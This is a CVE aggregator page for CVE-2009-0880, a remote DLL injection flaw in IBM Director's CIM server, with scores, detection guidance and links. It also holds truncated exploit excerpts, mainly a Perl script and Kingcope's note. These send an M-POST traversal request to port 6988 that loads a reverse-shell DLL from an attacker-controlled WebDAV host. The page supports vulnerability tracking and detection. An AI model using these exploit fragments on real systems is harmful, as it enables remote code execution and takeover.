CVE-2009-0880
published 2009-03-12CVE-2009-0880: Directory traversal vulnerability in the CIM server in IBM Director before 5.20.3 Service Update 2 on Windows allows remote attackers to load and execute…
PriorityP350medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
31.60%
98.1th percentile
Directory traversal vulnerability in the CIM server in IBM Director before 5.20.3 Service Update 2 on Windows allows remote attackers to load and execute arbitrary local DLL code via a .. (dot dot) in a /CIMListener/ URI in an M-POST request.
Affected
15 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ibm | director | <= 5.20.3 | — |
| ibm | director | — | — |
| ibm | director | — | — |
| ibm | director | — | — |
| ibm | director | — | — |
| ibm | director | — | — |
| ibm | director | — | — |
| ibm | director | — | — |
| ibm | director | — | — |
| ibm | director | — | — |
| ibm | director | — | — |
| ibm | director | — | — |
| ibm | director | — | — |
| ibm | director | — | — |
| ibm | director | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect M-POST requests to /CIMListener/ on TCP port 6988 with directory traversal (dot dot) sequences in the URI path, indicating exploitation of CVE-2009-0880. ↗
- →Scan for vulnerable IBM Director CIM servers by probing TCP/6988 with: M-POST /CIMListener/ HTTP/1.1 and checking for an HTTP 200 response containing 'CIMVERSION'. ↗
- →Check for the presence of the WebClient (WebDAV Mini-Redirector) service being enabled on target Windows hosts, as it is a prerequisite for remote DLL injection exploitation. ↗
- →Inspect HTTP headers on port 6988 for the combination of Man, CIMOperation, CIMExport, and CIMExportMethod headers, which are characteristic of exploit traffic against this vulnerability. ↗
- →Monitor for User-Agent strings matching Windows NT 5.1/5.2 or MiniRedir/5.1/5.2 patterns on the attacker-controlled WebDAV server, used by the exploit to fingerprint the target for payload delivery. ↗
- ·The WebDAV-based remote DLL injection vector requires the WebClient service to be running on the target; exploitation is not possible if it is disabled (default on Windows 2003 SP2). ↗
- ·The Metasploit module requires SRVPORT=80 and URIPATH=/ for the WebDAV delivery component to function; non-standard configurations will cause the exploit to fail. ↗
- ·The exploit affects IBM Director versions 5.20.3 and before, but not 5.2.30 SP2 and above; patched systems are not vulnerable. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
IBM System Director Agent - DLL Injection (Metasploit)
exploitdb·2012-12-07
CVE-2009-0880 IBM System Director Agent - DLL Injection (Metasploit)
IBM System Director Agent - DLL Injection (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'IBM System Director Agent DLL Injection',
'Description' => %q{
This module abuses the "wmicimsv" service on IBM System Director Agent 5.20.3
to accomplish arbitrary DLL injection and execute arbitrary code with SYSTEM
privileges.
In order to accomplish remote DLL injection it uses a WebDAV service as disclosed
by kingcope on December 2012. Because of this, the target host must have the
WebClient service (WebDAV Mini-Redirector) enabled. It is enabled and aut
Exploit-DB
IBM System Director Agent - Remote System Level
exploitdb·2012-12-02·CVSS 6.8
CVE-2009-0880 [MEDIUM] IBM System Director Agent - Remote System Level
IBM System Director Agent - Remote System Level
---
IBM System Director Remote System Level Exploit (CVE-2009-0880 extended zeroday)
Copyright (C) 2012 Kingcope
IBM System Director has the port 6988 open. By using a special request
to a vulnerable server,
the attacker can force to load a dll remotely from a WebDAV share.
The following exploit will load the dll from
\\isowarez.de\\director\wootwoot.dll
the wootwoot.dll is a reverse shell that will send a shell back to the
attacker (the code has to be inside the dll initialization routine).
The IBM Director exploit works on versions 5.20.3 and before, but not
on 5.2.30 SP2 and above.
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0880
There was a prior CVE for it, the CVE states the attack can load local
files only,
Exploit-DB
IBM System Director Agent 5.20 - CIM Server Privilege Escalation
exploitdb·2009-03-10
CVE-2009-0880 IBM System Director Agent 5.20 - CIM Server Privilege Escalation
IBM System Director Agent 5.20 - CIM Server Privilege Escalation
---
source: https://www.securityfocus.com/bid/34065/info
IBM Director is prone to a privilege-escalation vulnerability that affects the CIM server.
Attackers can leverage this issue to execute arbitrary code with elevated privileges in the context of the CIM server process.
Versions prior to IBM Director 5.20.3 Service Update 2 are affected.
use IO::Socket;
#1st argument: target host
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "6988",
Proto => 'tcp');
$payload =
qq{
Sample CIM_AlertIndication indication
1
3
2
20010515104354.000000:000
};
$req =
"M-POST /CIMListener/\\\\isowarez.de\\director\\wootwoot HTTP/1.1\r\n"
."Host: $ARGV[0]\r\n"
."Content-Type: application/xml; charset=
Metasploit
IBM System Director Agent DLL Injection
metasploit
IBM System Director Agent DLL Injection
IBM System Director Agent DLL Injection
This module abuses the "wmicimsv" service on IBM System Director Agent 5.20.3 to accomplish arbitrary DLL injection and execute arbitrary code with SYSTEM privileges. In order to accomplish remote DLL injection it uses a WebDAV service as disclosed by kingcope on December 2012. Because of this, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled. It is enabled and automatically started by default on Windows XP SP3, but disabled by default on Windows 2003 SP2.
No writeups or analysis indexed.
http://osvdb.org/52616http://secunia.com/advisories/34212http://www.securityfocus.com/archive/1/501639/100/0/threadedhttp://www.securityfocus.com/bid/34065http://www.vupen.com/english/advisories/2009/0656https://exchange.xforce.ibmcloud.com/vulnerabilities/49286https://www.sec-consult.com/files/20090305-2_IBM_director_privilege_escalation.txthttps://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=dmp&S_PKG=director_x_520&S_TACT=sms&lang=en_US&cp=UTF-8http://osvdb.org/52616http://secunia.com/advisories/34212http://www.securityfocus.com/archive/1/501639/100/0/threadedhttp://www.securityfocus.com/bid/34065http://www.vupen.com/english/advisories/2009/0656https://exchange.xforce.ibmcloud.com/vulnerabilities/49286https://www.sec-consult.com/files/20090305-2_IBM_director_privilege_escalation.txthttps://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=dmp&S_PKG=director_x_520&S_TACT=sms&lang=en_US&cp=UTF-8
2009-03-12
Published